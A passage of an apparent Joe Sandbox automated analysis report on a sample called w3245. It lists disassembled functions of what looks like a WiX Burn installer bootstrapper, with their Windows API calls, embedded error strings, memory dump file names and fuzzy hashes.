                                                                                                                                                                    • Engine active cannot be changed because it was already in that state., xrefs: 0090D4FE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                                                                                                                    • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                                                                                                                                    • API String ID: 3376869089-1544469594
                                                                                                                                                                    • Opcode ID: d41ce324cd2bc2818f47b28413097f5b5bee3fbaeebf06f7f1f5ce04c80e86ee
                                                                                                                                                                    • Instruction ID: e30696c1d441d24dd034749087e271e4f58c507f5e74b4e802a21c358972ca57
                                                                                                                                                                    • Opcode Fuzzy Hash: d41ce324cd2bc2818f47b28413097f5b5bee3fbaeebf06f7f1f5ce04c80e86ee
                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0AF36304208AFD7209EEADC98D9777BCFBD6765300442AFA01C3190DB70E8058760
                                                                                                                                                                    Function 00941C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 00941CB3
                                                                                                                                                                    • GetLastError.KERNEL32(?,009049DA,00000001,?,?,00904551,?,?,?,?,00905466,?,?,?,?), ref: 00941CC2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                    • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                                                                                                                    • API String ID: 199729137-398595594
                                                                                                                                                                    • Opcode ID: 97c0e66bd6824dcd7caacf94240dea532ffc6a88aeb4edc1c067abb979d9a4c9
                                                                                                                                                                    • Instruction ID: eaf23add60e19a18595d14aec17fb37fed647abc26063db896d5be42038adf1d
                                                                                                                                                                    • Opcode Fuzzy Hash: 97c0e66bd6824dcd7caacf94240dea532ffc6a88aeb4edc1c067abb979d9a4c9
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B01D17BFD523657C32216A6EC09F1A29485B417AAF014122ED40AB2A0E7A0CCC0D6D6
                                                                                                                                                                    Function 0093495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0093490E,00000000,?,009348AE,00000000,00967F08,0000000C,00934A05,00000000,00000002), ref: 0093497D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00934990
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0093490E,00000000,?,009348AE,00000000,00967F08,0000000C,00934A05,00000000,00000002), ref: 009349B3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                    • Opcode ID: 3834420a4d843f09dc03fbe29a0085e5c519249cc08c66dece5641438bd1a369
                                                                                                                                                                    • Instruction ID: c99e5d9a7e93f1fb5d983f5bd777ace73055a98a148fb7d15270aeecdfa9daec
                                                                                                                                                                    • Opcode Fuzzy Hash: 3834420a4d843f09dc03fbe29a0085e5c519249cc08c66dece5641438bd1a369
                                                                                                                                                                    • Instruction Fuzzy Hash: 82F04F38A28218BBCB119FA1EC19BAEBFB8EB45B55F054069F805A2150CB719940DE95
                                                                                                                                                                    Function 00919287 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009193C9
                                                                                                                                                                      • Part of subcall function 009456CF: GetLastError.KERNEL32(?,?,0091933A,?,00000003,00000000,?), ref: 009456EE
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get certificate public key identifier., xrefs: 009193F7
                                                                                                                                                                    • Failed to read certificate thumbprint., xrefs: 009193BD
                                                                                                                                                                    • cache.cpp, xrefs: 009193ED
                                                                                                                                                                    • Failed to find expected public key in certificate chain., xrefs: 0091938A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                                                                                                                    • API String ID: 1452528299-3408201827
                                                                                                                                                                    • Opcode ID: 0d143e627db3846f2416bc6416b78e90397385ad419bd709d3c7339ee20cdebb
                                                                                                                                                                    • Instruction ID: ee01dcc68e96accd6c19d123df2aa60847207c8a01e80768f9b10a61abebc2ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 0d143e627db3846f2416bc6416b78e90397385ad419bd709d3c7339ee20cdebb
                                                                                                                                                                    • Instruction Fuzzy Hash: F9416D72F00219AFDB10DAA9D851EEEB7B8AB48710F014129FA15E7291D674ED41CBA0
                                                                                                                                                                    Function 009021AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 009021F2
                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 009021FE
                                                                                                                                                                      • Part of subcall function 00903BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BDB
                                                                                                                                                                      • Part of subcall function 00903BD3: HeapSize.KERNEL32(00000000,?,009021CC,000001C7,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903BE2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                    • String ID: strutil.cpp
                                                                                                                                                                    • API String ID: 3662877508-3612885251
                                                                                                                                                                    • Opcode ID: ca7e91daa0538d440e6e5dbcc56b0f3e2c6cea8f3ebcfb952186f555458dd530
                                                                                                                                                                    • Instruction ID: 5b4ac932d8d3c9668c60ce2e2f01067be19fee8bd440fc02512903880776a793
                                                                                                                                                                    • Opcode Fuzzy Hash: ca7e91daa0538d440e6e5dbcc56b0f3e2c6cea8f3ebcfb952186f555458dd530
                                                                                                                                                                    • Instruction Fuzzy Hash: 5131F53260522AAFDB288FEDCC4CA6A3B9DAF55774B214225FD259F2D0E671CC0097D0
                                                                                                                                                                    Function 009494FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 009495D5
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 00949610
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 0094962C
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00949639
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 00949646
                                                                                                                                                                      • Part of subcall function 00940FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,009495C2,00000001), ref: 00940FED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$InfoOpenQuery
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 796878624-0
                                                                                                                                                                    • Opcode ID: 0887b28885dd4aef3395982a3be96aae5c71cf8d9e9df00391b34ac2128fcc7a
                                                                                                                                                                    • Instruction ID: 14bc0d8c30bdac64cf02ff171028abeba2fc7971aaad55f3089159d00cd10ff1
                                                                                                                                                                    • Opcode Fuzzy Hash: 0887b28885dd4aef3395982a3be96aae5c71cf8d9e9df00391b34ac2128fcc7a
                                                                                                                                                                    • Instruction Fuzzy Hash: 88412672C0122DFFCF22AF948D81DAEFAB9EF54754F1241AAEA1476121D7314E50AA90
                                                                                                                                                                    Function 00908A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?,?,0090972D,?,?), ref: 00908A27
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?,?,0090972D,?,?), ref: 00908A2F
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?), ref: 00908A7E
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?), ref: 00908AE0
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00908BC8,0090972D,?,0090972D,?), ref: 00908B0D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString$lstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1657112622-0
                                                                                                                                                                    • Opcode ID: 6a8b2707ab033323533dd8a13b89c8bb9dac3be10afc76c66fdd8f047456940a
                                                                                                                                                                    • Instruction ID: 7eedd98681f9fb0ffe8c918c31d1b1d0124e303e0ae73e8bf27611b3d208a9a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a8b2707ab033323533dd8a13b89c8bb9dac3be10afc76c66fdd8f047456940a
                                                                                                                                                                    • Instruction Fuzzy Hash: E6318572B04118FFCF118F58CC89AAF3F6EEB49350F144416F98987590CA359D90DBA0
                                                                                                                                                                    Function 009074B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(009053BD,WixBundleOriginalSource,?,?,0091A623,840F01E8,WixBundleOriginalSource,?,0096AA90,?,00000000,00905445,00000001,?,?,00905445), ref: 009074C3
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(009053BD,009053BD,00000000,00000000,?,?,0091A623,840F01E8,WixBundleOriginalSource,?,0096AA90,?,00000000,00905445,00000001,?), ref: 0090752A
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to get value as string for variable: %ls, xrefs: 00907519
                                                                                                                                                                    • WixBundleOriginalSource, xrefs: 009074BF
                                                                                                                                                                    • Failed to get value of variable: %ls, xrefs: 009074FD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                                                                                                                    • API String ID: 3168844106-30613933
                                                                                                                                                                    • Opcode ID: f70db773cbd5aca1ff1e8ce14c08ec45b02a5c7b30e0fbea5cab65f928c5c194
                                                                                                                                                                    • Instruction ID: c6e3e633d54fb0b9d9bef5d527456f77358380835cd9758be9f6dde75f9b7dbf
                                                                                                                                                                    • Opcode Fuzzy Hash: f70db773cbd5aca1ff1e8ce14c08ec45b02a5c7b30e0fbea5cab65f928c5c194
                                                                                                                                                                    • Instruction Fuzzy Hash: 68019E32D48128EFCF219E94CC05E9EBA68EF05335F104161FD04A62A0C336AA11A7D0
                                                                                                                                                                    Function 0092D152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,00000000,?,0092D148,00000000), ref: 0092D16D
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0092D148,00000000), ref: 0092D179
                                                                                                                                                                    • CloseHandle.KERNEL32(0094B518,00000000,?,00000000,?,0092D148,00000000), ref: 0092D186
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0092D148,00000000), ref: 0092D193
                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(0094B4E8,00000000,?,0092D148,00000000), ref: 0092D1A2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 260491571-0
                                                                                                                                                                    • Opcode ID: 94f56c31da1c3384d961cae6702edb693ab03c6bd6f0f3de744801adc34f9feb
                                                                                                                                                                    • Instruction ID: 6193f691961855d25e73b26df9929428d6741309066e2dd6e095de945557e13b
                                                                                                                                                                    • Opcode Fuzzy Hash: 94f56c31da1c3384d961cae6702edb693ab03c6bd6f0f3de744801adc34f9feb
                                                                                                                                                                    • Instruction Fuzzy Hash: BF014636406B25DFDB31AF66E880806F7EDAF50311305C93EE1A652935C371A8A0DF80
                                                                                                                                                                    Function 00948713 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 00948820
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0094882A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                    • String ID: clbcatq.dll$timeutil.cpp
                                                                                                                                                                    • API String ID: 2781989572-961924111
                                                                                                                                                                    • Opcode ID: 5207113ff20567d215752ce75b3e5b191f13f98626489b4783affad26ac3578b
                                                                                                                                                                    • Instruction ID: c56705771e932c145494abc6a1427faa45219e55b69c52666f296953ceb92424
                                                                                                                                                                    • Opcode Fuzzy Hash: 5207113ff20567d215752ce75b3e5b191f13f98626489b4783affad26ac3578b
                                                                                                                                                                    • Instruction Fuzzy Hash: 29412876E1021976D7219BB88C05FBF77B9AF91700F658929FA01B7280EE35CE0097A1
                                                                                                                                                                    Function 009436CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantInit.OLEAUT32(000002C0), ref: 009436E6
                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 009436F6
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 009437D5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Variant$AllocClearInitString
                                                                                                                                                                    • String ID: xmlutil.cpp
                                                                                                                                                                    • API String ID: 2213243845-1270936966
                                                                                                                                                                    • Opcode ID: 3b0d987211688d60bd67e4833c6b93ddb44edf2dc6b296f77d17f3c50172a225
                                                                                                                                                                    • Instruction ID: 4fe742e00e089186503610493a90d195ab80dca4b05d11456a795a0309796d74
                                                                                                                                                                    • Opcode Fuzzy Hash: 3b0d987211688d60bd67e4833c6b93ddb44edf2dc6b296f77d17f3c50172a225
                                                                                                                                                                    • Instruction Fuzzy Hash: 404153B5A10229ABCB119FB5C888EAFBBACAF45750F1581A4FD55EB211D634DE008B90
                                                                                                                                                                    Function 00940E4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00928E1B), ref: 00940EAA
                                                                                                                                                                    • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00928E1B,00000000), ref: 00940EC8
                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000003,?,?,00928E1B,00000000,00000000,00000000), ref: 00940F1E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Enum$InfoQuery
                                                                                                                                                                    • String ID: regutil.cpp
                                                                                                                                                                    • API String ID: 73471667-955085611
                                                                                                                                                                    • Opcode ID: 8f0d5fa634c1ba12245e82fdbf8b73e5d380731e5de01c22ca642d2924bc60d2
                                                                                                                                                                    • Instruction ID: ae2a14f847b85e15935942f30b1fc9386b322e5b340b2e9b4360246df0272293
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f0d5fa634c1ba12245e82fdbf8b73e5d380731e5de01c22ca642d2924bc60d2
                                                                                                                                                                    • Instruction Fuzzy Hash: 1F31A176901129BFEB318B95CD84EAFBB6CEF84760F1544A5BE04AB210E7719E1096A0
                                                                                                                                                                    Function 00928B17 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0096AAA0,00000000,?,009457E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00940F80
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000088,00000000,000002C0,00000410,00020019,00000000,000002C0,00000000,?,?,?,00928E57,00000000,00000000), ref: 00928BD4
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to initialize package from related bundle id: %ls, xrefs: 00928BBA
                                                                                                                                                                    • Failed to ensure there is space for related bundles., xrefs: 00928B87
                                                                                                                                                                    • Failed to open uninstall key for potential related bundle: %ls, xrefs: 00928B43
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                    • String ID: Failed to ensure there is space for related bundles.$Failed to initialize package from related bundle id: %ls$Failed to open uninstall key for potential related bundle: %ls
                                                                                                                                                                    • API String ID: 47109696-1717420724
                                                                                                                                                                    • Opcode ID: e397894ee51d9c0fe791c7f8fa18779759055e0e9559e57ea5a1681f020717f9
                                                                                                                                                                    • Instruction ID: 174e9cee88358f7ebca893f17a21c2086b801fbc18b83dbc6e821813e48649a2
